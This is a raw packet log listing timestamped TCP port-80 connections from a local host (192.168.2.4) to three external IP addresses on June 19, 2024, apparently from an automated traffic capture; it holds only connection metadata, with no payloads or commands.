                                                                            Jun 19, 2024 22:39:50.968607903 CEST804975913.228.81.39192.168.2.4
                                                                            Jun 19, 2024 22:39:52.176877975 CEST804975913.228.81.39192.168.2.4
                                                                            Jun 19, 2024 22:39:52.176923037 CEST804975913.228.81.39192.168.2.4
                                                                            Jun 19, 2024 22:39:52.176981926 CEST804975913.228.81.39192.168.2.4
                                                                            Jun 19, 2024 22:39:52.177031040 CEST804975913.228.81.39192.168.2.4
                                                                            Jun 19, 2024 22:39:52.177037954 CEST4975980192.168.2.413.228.81.39
                                                                            Jun 19, 2024 22:39:52.177086115 CEST804975913.228.81.39192.168.2.4
                                                                            Jun 19, 2024 22:39:52.177123070 CEST804975913.228.81.39192.168.2.4
                                                                            Jun 19, 2024 22:39:52.177143097 CEST4975980192.168.2.413.228.81.39
                                                                            Jun 19, 2024 22:39:52.177175045 CEST804975913.228.81.39192.168.2.4
                                                                            Jun 19, 2024 22:39:52.177210093 CEST804975913.228.81.39192.168.2.4
                                                                            Jun 19, 2024 22:39:52.177216053 CEST4975980192.168.2.413.228.81.39
                                                                            Jun 19, 2024 22:39:52.177242041 CEST804975913.228.81.39192.168.2.4
                                                                            Jun 19, 2024 22:39:52.177277088 CEST804975913.228.81.39192.168.2.4
                                                                            Jun 19, 2024 22:39:52.177282095 CEST4975980192.168.2.413.228.81.39
                                                                            Jun 19, 2024 22:39:52.177408934 CEST4975980192.168.2.413.228.81.39
                                                                            Jun 19, 2024 22:39:52.177454948 CEST804975913.228.81.39192.168.2.4
                                                                            Jun 19, 2024 22:39:52.177584887 CEST4975980192.168.2.413.228.81.39
                                                                            Jun 19, 2024 22:39:52.470763922 CEST4975980192.168.2.413.228.81.39
                                                                            Jun 19, 2024 22:39:53.490056038 CEST4976080192.168.2.413.228.81.39
                                                                            Jun 19, 2024 22:39:53.495168924 CEST804976013.228.81.39192.168.2.4
                                                                            Jun 19, 2024 22:39:53.498131037 CEST4976080192.168.2.413.228.81.39
                                                                            Jun 19, 2024 22:39:53.502044916 CEST4976080192.168.2.413.228.81.39
                                                                            Jun 19, 2024 22:39:53.506930113 CEST804976013.228.81.39192.168.2.4
                                                                            Jun 19, 2024 22:39:54.473053932 CEST804976013.228.81.39192.168.2.4
                                                                            Jun 19, 2024 22:39:54.473103046 CEST804976013.228.81.39192.168.2.4
                                                                            Jun 19, 2024 22:39:54.473134995 CEST804976013.228.81.39192.168.2.4
                                                                            Jun 19, 2024 22:39:54.473169088 CEST804976013.228.81.39192.168.2.4
                                                                            Jun 19, 2024 22:39:54.473169088 CEST4976080192.168.2.413.228.81.39
                                                                            Jun 19, 2024 22:39:54.473201036 CEST804976013.228.81.39192.168.2.4
                                                                            Jun 19, 2024 22:39:54.473234892 CEST804976013.228.81.39192.168.2.4
                                                                            Jun 19, 2024 22:39:54.473251104 CEST4976080192.168.2.413.228.81.39
                                                                            Jun 19, 2024 22:39:54.473267078 CEST804976013.228.81.39192.168.2.4
                                                                            Jun 19, 2024 22:39:54.473283052 CEST4976080192.168.2.413.228.81.39
                                                                            Jun 19, 2024 22:39:54.473299026 CEST804976013.228.81.39192.168.2.4
                                                                            Jun 19, 2024 22:39:54.473330021 CEST804976013.228.81.39192.168.2.4
                                                                            Jun 19, 2024 22:39:54.473347902 CEST4976080192.168.2.413.228.81.39
                                                                            Jun 19, 2024 22:39:54.473364115 CEST804976013.228.81.39192.168.2.4
                                                                            Jun 19, 2024 22:39:54.473407984 CEST4976080192.168.2.413.228.81.39
                                                                            Jun 19, 2024 22:39:54.478180885 CEST804976013.228.81.39192.168.2.4
                                                                            Jun 19, 2024 22:39:54.533190966 CEST4976080192.168.2.413.228.81.39
                                                                            Jun 19, 2024 22:39:54.712125063 CEST804976013.228.81.39192.168.2.4
                                                                            Jun 19, 2024 22:39:54.712163925 CEST804976013.228.81.39192.168.2.4
                                                                            Jun 19, 2024 22:39:54.712266922 CEST4976080192.168.2.413.228.81.39
                                                                            Jun 19, 2024 22:39:54.712322950 CEST804976013.228.81.39192.168.2.4
                                                                            Jun 19, 2024 22:39:54.712568998 CEST804976013.228.81.39192.168.2.4
                                                                            Jun 19, 2024 22:39:54.712616920 CEST4976080192.168.2.413.228.81.39
                                                                            Jun 19, 2024 22:39:54.712619066 CEST804976013.228.81.39192.168.2.4
                                                                            Jun 19, 2024 22:39:54.712651968 CEST804976013.228.81.39192.168.2.4
                                                                            Jun 19, 2024 22:39:54.712683916 CEST804976013.228.81.39192.168.2.4
                                                                            Jun 19, 2024 22:39:54.712701082 CEST4976080192.168.2.413.228.81.39
                                                                            Jun 19, 2024 22:39:54.713089943 CEST804976013.228.81.39192.168.2.4
                                                                            Jun 19, 2024 22:39:54.713139057 CEST4976080192.168.2.413.228.81.39
                                                                            Jun 19, 2024 22:39:54.713143110 CEST804976013.228.81.39192.168.2.4
                                                                            Jun 19, 2024 22:39:54.713176966 CEST804976013.228.81.39192.168.2.4
                                                                            Jun 19, 2024 22:39:54.713232994 CEST4976080192.168.2.413.228.81.39
                                                                            Jun 19, 2024 22:39:54.713303089 CEST804976013.228.81.39192.168.2.4
                                                                            Jun 19, 2024 22:39:54.713335037 CEST804976013.228.81.39192.168.2.4
                                                                            Jun 19, 2024 22:39:54.713382006 CEST4976080192.168.2.413.228.81.39
                                                                            Jun 19, 2024 22:39:54.713984013 CEST804976013.228.81.39192.168.2.4
                                                                            Jun 19, 2024 22:39:54.714057922 CEST804976013.228.81.39192.168.2.4
                                                                            Jun 19, 2024 22:39:54.714103937 CEST804976013.228.81.39192.168.2.4
                                                                            Jun 19, 2024 22:39:54.714106083 CEST4976080192.168.2.413.228.81.39
                                                                            Jun 19, 2024 22:39:54.714463949 CEST804976013.228.81.39192.168.2.4
                                                                            Jun 19, 2024 22:39:54.714514017 CEST4976080192.168.2.413.228.81.39
                                                                            Jun 19, 2024 22:39:54.718214035 CEST4976080192.168.2.413.228.81.39
                                                                            Jun 19, 2024 22:39:54.723249912 CEST804976013.228.81.39192.168.2.4
                                                                            Jun 19, 2024 22:40:07.840234995 CEST4976180192.168.2.4162.0.213.94
                                                                            Jun 19, 2024 22:40:07.846033096 CEST8049761162.0.213.94192.168.2.4
                                                                            Jun 19, 2024 22:40:07.846218109 CEST4976180192.168.2.4162.0.213.94
                                                                            Jun 19, 2024 22:40:07.849802017 CEST4976180192.168.2.4162.0.213.94
                                                                            Jun 19, 2024 22:40:07.855266094 CEST8049761162.0.213.94192.168.2.4
                                                                            Jun 19, 2024 22:40:08.470860004 CEST8049761162.0.213.94192.168.2.4
                                                                            Jun 19, 2024 22:40:08.470916986 CEST8049761162.0.213.94192.168.2.4
                                                                            Jun 19, 2024 22:40:08.470953941 CEST8049761162.0.213.94192.168.2.4
                                                                            Jun 19, 2024 22:40:08.470988035 CEST8049761162.0.213.94192.168.2.4
                                                                            Jun 19, 2024 22:40:08.471021891 CEST8049761162.0.213.94192.168.2.4
                                                                            Jun 19, 2024 22:40:08.471040964 CEST4976180192.168.2.4162.0.213.94
                                                                            Jun 19, 2024 22:40:08.471040964 CEST4976180192.168.2.4162.0.213.94
                                                                            Jun 19, 2024 22:40:08.471056938 CEST8049761162.0.213.94192.168.2.4
                                                                            Jun 19, 2024 22:40:08.471091986 CEST8049761162.0.213.94192.168.2.4
                                                                            Jun 19, 2024 22:40:08.471112013 CEST4976180192.168.2.4162.0.213.94
                                                                            Jun 19, 2024 22:40:08.471126080 CEST8049761162.0.213.94192.168.2.4
                                                                            Jun 19, 2024 22:40:08.471160889 CEST8049761162.0.213.94192.168.2.4
                                                                            Jun 19, 2024 22:40:08.471188068 CEST4976180192.168.2.4162.0.213.94
                                                                            Jun 19, 2024 22:40:08.471196890 CEST8049761162.0.213.94192.168.2.4
                                                                            Jun 19, 2024 22:40:08.471251011 CEST4976180192.168.2.4162.0.213.94
                                                                            Jun 19, 2024 22:40:08.476663113 CEST8049761162.0.213.94192.168.2.4
                                                                            Jun 19, 2024 22:40:08.476713896 CEST8049761162.0.213.94192.168.2.4
                                                                            Jun 19, 2024 22:40:08.476752043 CEST8049761162.0.213.94192.168.2.4
                                                                            Jun 19, 2024 22:40:08.476905107 CEST4976180192.168.2.4162.0.213.94
                                                                            Jun 19, 2024 22:40:08.561573982 CEST4976180192.168.2.4162.0.213.94
                                                                            Jun 19, 2024 22:40:08.562906981 CEST8049761162.0.213.94192.168.2.4
                                                                            Jun 19, 2024 22:40:08.562954903 CEST8049761162.0.213.94192.168.2.4
                                                                            Jun 19, 2024 22:40:08.562994003 CEST8049761162.0.213.94192.168.2.4
                                                                            Jun 19, 2024 22:40:08.563000917 CEST4976180192.168.2.4162.0.213.94
                                                                            Jun 19, 2024 22:40:08.563051939 CEST4976180192.168.2.4162.0.213.94
                                                                            Jun 19, 2024 22:40:09.361510038 CEST4976180192.168.2.4162.0.213.94
                                                                            Jun 19, 2024 22:40:10.379600048 CEST4976280192.168.2.4162.0.213.94
                                                                            Jun 19, 2024 22:40:10.385226011 CEST8049762162.0.213.94192.168.2.4
                                                                            Jun 19, 2024 22:40:10.385333061 CEST4976280192.168.2.4162.0.213.94
                                                                            Jun 19, 2024 22:40:10.387191057 CEST4976280192.168.2.4162.0.213.94
                                                                            Jun 19, 2024 22:40:10.392539024 CEST8049762162.0.213.94192.168.2.4
                                                                            Jun 19, 2024 22:40:10.974095106 CEST8049762162.0.213.94192.168.2.4
                                                                            Jun 19, 2024 22:40:10.974159956 CEST8049762162.0.213.94192.168.2.4
                                                                            Jun 19, 2024 22:40:10.974195957 CEST8049762162.0.213.94192.168.2.4
                                                                            Jun 19, 2024 22:40:10.974229097 CEST8049762162.0.213.94192.168.2.4
                                                                            Jun 19, 2024 22:40:10.974262953 CEST8049762162.0.213.94192.168.2.4
                                                                            Jun 19, 2024 22:40:10.974296093 CEST8049762162.0.213.94192.168.2.4
                                                                            Jun 19, 2024 22:40:10.974332094 CEST8049762162.0.213.94192.168.2.4
                                                                            Jun 19, 2024 22:40:10.974370003 CEST8049762162.0.213.94192.168.2.4
                                                                            Jun 19, 2024 22:40:10.974391937 CEST4976280192.168.2.4162.0.213.94
                                                                            Jun 19, 2024 22:40:10.974392891 CEST4976280192.168.2.4162.0.213.94
                                                                            Jun 19, 2024 22:40:10.974392891 CEST4976280192.168.2.4162.0.213.94
                                                                            Jun 19, 2024 22:40:10.974482059 CEST4976280192.168.2.4162.0.213.94
                                                                            Jun 19, 2024 22:40:10.974613905 CEST8049762162.0.213.94192.168.2.4
                                                                            Jun 19, 2024 22:40:10.974684000 CEST8049762162.0.213.94192.168.2.4
                                                                            Jun 19, 2024 22:40:10.974740028 CEST4976280192.168.2.4162.0.213.94
                                                                            Jun 19, 2024 22:40:10.980103970 CEST8049762162.0.213.94192.168.2.4
                                                                            Jun 19, 2024 22:40:10.980180025 CEST8049762162.0.213.94192.168.2.4
                                                                            Jun 19, 2024 22:40:10.980217934 CEST8049762162.0.213.94192.168.2.4
                                                                            Jun 19, 2024 22:40:10.980349064 CEST4976280192.168.2.4162.0.213.94
                                                                            Jun 19, 2024 22:40:11.060668945 CEST8049762162.0.213.94192.168.2.4
                                                                            Jun 19, 2024 22:40:11.060759068 CEST8049762162.0.213.94192.168.2.4
                                                                            Jun 19, 2024 22:40:11.060792923 CEST8049762162.0.213.94192.168.2.4
                                                                            Jun 19, 2024 22:40:11.060864925 CEST4976280192.168.2.4162.0.213.94
                                                                            Jun 19, 2024 22:40:11.060864925 CEST4976280192.168.2.4162.0.213.94
                                                                            Jun 19, 2024 22:40:11.892704010 CEST4976280192.168.2.4162.0.213.94
                                                                            Jun 19, 2024 22:40:12.916630983 CEST4976380192.168.2.4162.0.213.94
                                                                            Jun 19, 2024 22:40:12.922688007 CEST8049763162.0.213.94192.168.2.4
                                                                            Jun 19, 2024 22:40:12.922811985 CEST4976380192.168.2.4162.0.213.94
                                                                            Jun 19, 2024 22:40:12.924845934 CEST4976380192.168.2.4162.0.213.94
                                                                            Jun 19, 2024 22:40:12.930260897 CEST8049763162.0.213.94192.168.2.4
                                                                            Jun 19, 2024 22:40:12.930305958 CEST8049763162.0.213.94192.168.2.4
                                                                            Jun 19, 2024 22:40:12.930334091 CEST8049763162.0.213.94192.168.2.4
                                                                            Jun 19, 2024 22:40:12.930361986 CEST8049763162.0.213.94192.168.2.4
                                                                            Jun 19, 2024 22:40:12.930389881 CEST8049763162.0.213.94192.168.2.4
                                                                            Jun 19, 2024 22:40:12.930444002 CEST8049763162.0.213.94192.168.2.4
                                                                            Jun 19, 2024 22:40:12.930473089 CEST8049763162.0.213.94192.168.2.4
                                                                            Jun 19, 2024 22:40:12.930499077 CEST8049763162.0.213.94192.168.2.4
                                                                            Jun 19, 2024 22:40:12.930526972 CEST8049763162.0.213.94192.168.2.4
                                                                            Jun 19, 2024 22:40:13.718149900 CEST8049763162.0.213.94192.168.2.4
                                                                            Jun 19, 2024 22:40:13.718221903 CEST8049763162.0.213.94192.168.2.4
                                                                            Jun 19, 2024 22:40:13.718257904 CEST8049763162.0.213.94192.168.2.4
                                                                            Jun 19, 2024 22:40:13.718291044 CEST8049763162.0.213.94192.168.2.4
                                                                            Jun 19, 2024 22:40:13.718301058 CEST4976380192.168.2.4162.0.213.94
                                                                            Jun 19, 2024 22:40:13.718326092 CEST8049763162.0.213.94192.168.2.4
                                                                            Jun 19, 2024 22:40:13.718359947 CEST8049763162.0.213.94192.168.2.4
                                                                            Jun 19, 2024 22:40:13.718394041 CEST4976380192.168.2.4162.0.213.94
                                                                            Jun 19, 2024 22:40:13.718426943 CEST8049763162.0.213.94192.168.2.4
                                                                            Jun 19, 2024 22:40:13.718461990 CEST8049763162.0.213.94192.168.2.4
                                                                            Jun 19, 2024 22:40:13.718496084 CEST8049763162.0.213.94192.168.2.4
                                                                            Jun 19, 2024 22:40:13.718504906 CEST4976380192.168.2.4162.0.213.94
                                                                            Jun 19, 2024 22:40:13.718534946 CEST8049763162.0.213.94192.168.2.4
                                                                            Jun 19, 2024 22:40:13.718578100 CEST4976380192.168.2.4162.0.213.94
                                                                            Jun 19, 2024 22:40:13.721205950 CEST4976380192.168.2.4162.0.213.94
                                                                            Jun 19, 2024 22:40:13.723939896 CEST8049763162.0.213.94192.168.2.4
                                                                            Jun 19, 2024 22:40:13.723989964 CEST8049763162.0.213.94192.168.2.4
                                                                            Jun 19, 2024 22:40:13.724028111 CEST8049763162.0.213.94192.168.2.4
                                                                            Jun 19, 2024 22:40:13.724107027 CEST4976380192.168.2.4162.0.213.94
                                                                            Jun 19, 2024 22:40:13.767563105 CEST4976380192.168.2.4162.0.213.94
                                                                            Jun 19, 2024 22:40:13.804776907 CEST8049763162.0.213.94192.168.2.4
                                                                            Jun 19, 2024 22:40:13.804826021 CEST8049763162.0.213.94192.168.2.4
                                                                            Jun 19, 2024 22:40:13.804864883 CEST8049763162.0.213.94192.168.2.4
                                                                            Jun 19, 2024 22:40:13.805036068 CEST4976380192.168.2.4162.0.213.94
                                                                            Jun 19, 2024 22:40:14.439508915 CEST4976380192.168.2.4162.0.213.94
                                                                            Jun 19, 2024 22:40:15.458201885 CEST4976480192.168.2.4162.0.213.94
                                                                            Jun 19, 2024 22:40:15.463670015 CEST8049764162.0.213.94192.168.2.4
                                                                            Jun 19, 2024 22:40:15.466281891 CEST4976480192.168.2.4162.0.213.94
                                                                            Jun 19, 2024 22:40:15.470191002 CEST4976480192.168.2.4162.0.213.94
                                                                            Jun 19, 2024 22:40:15.475910902 CEST8049764162.0.213.94192.168.2.4
                                                                            Jun 19, 2024 22:40:16.099117041 CEST8049764162.0.213.94192.168.2.4
                                                                            Jun 19, 2024 22:40:16.099296093 CEST8049764162.0.213.94192.168.2.4
                                                                            Jun 19, 2024 22:40:16.102232933 CEST4976480192.168.2.4162.0.213.94
                                                                            Jun 19, 2024 22:40:16.106177092 CEST4976480192.168.2.4162.0.213.94
                                                                            Jun 19, 2024 22:40:16.111809015 CEST8049764162.0.213.94192.168.2.4
                                                                            Jun 19, 2024 22:40:17.152287960 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:17.161904097 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:17.161983967 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:17.162128925 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:17.167488098 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:17.807693005 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:17.807751894 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:17.807789087 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:17.807821989 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:17.807857037 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:17.807857037 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:17.807857037 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:17.807893991 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:17.807919025 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:17.807929039 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:17.807940006 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:17.807940006 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:17.807964087 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:17.807975054 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:17.808006048 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:17.808041096 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:17.808044910 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:17.808247089 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:17.813281059 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:17.813333035 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:17.813380003 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:17.813474894 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:17.901026964 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:17.901074886 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:17.901132107 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:17.901166916 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:17.901196957 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:17.901201010 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:17.901226997 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:17.901236057 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:17.901273012 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:17.901297092 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:17.901297092 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:17.901326895 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:17.901815891 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:17.901866913 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:17.901902914 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:17.901937008 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:17.901954889 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:17.901976109 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:17.902364016 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:17.902468920 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:17.902569056 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:17.902586937 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:17.902606010 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:17.902690887 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:17.902690887 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:17.902738094 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:17.902923107 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:17.903451920 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:17.903558016 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:17.903593063 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:17.903625011 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:17.903634071 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:17.903669119 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:17.903737068 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:17.903840065 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:17.906105042 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:17.906425953 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:17.994370937 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:17.994441986 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:17.994476080 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:17.994508982 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:17.994541883 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:17.994549036 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:17.994575977 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:17.994607925 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:17.994611025 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:17.994638920 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:17.994651079 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:17.994684935 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:17.994740963 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:17.994755030 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:17.994807959 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:17.994842052 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:17.994873047 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:17.994894981 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:17.994923115 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:17.994929075 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:17.994965076 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:17.994982958 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:17.994997978 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:17.995028973 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:17.995032072 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:17.995069027 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:17.995089054 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:17.995105982 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:17.995140076 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:17.995177031 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:17.995297909 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:17.995331049 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:17.995363951 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:17.995415926 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:17.995696068 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:17.995733976 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:17.995764971 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:17.995770931 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:17.995917082 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:17.995969057 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:17.996001959 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:17.996032000 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:17.996174097 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:17.996206045 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:17.996206045 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:17.996242046 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:17.996277094 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:17.996309996 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:17.996443033 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:17.996476889 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:17.996535063 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:17.996675968 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.082715034 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.082760096 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.082788944 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.083425999 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.087728024 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.087774038 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.087806940 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.087814093 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.087902069 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.087937117 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.087968111 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.087971926 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.088002920 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.088006973 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.088043928 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.088076115 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.088107109 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.088109016 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.088141918 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.088176966 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.088205099 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.088237047 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.088318110 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.088368893 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.088403940 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.088435888 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.088469982 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.088473082 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.088529110 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.088562965 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.088597059 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.088598967 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.088648081 CEST8049765185.234.72.101192.168.2.4
                                                                            Jun 19, 2024 22:40:18.088757992 CEST4976580192.168.2.4185.234.72.101
                                                                            Jun 19, 2024 22:40:18.088772058 CEST8049765185.234.72.101192.168.2.4
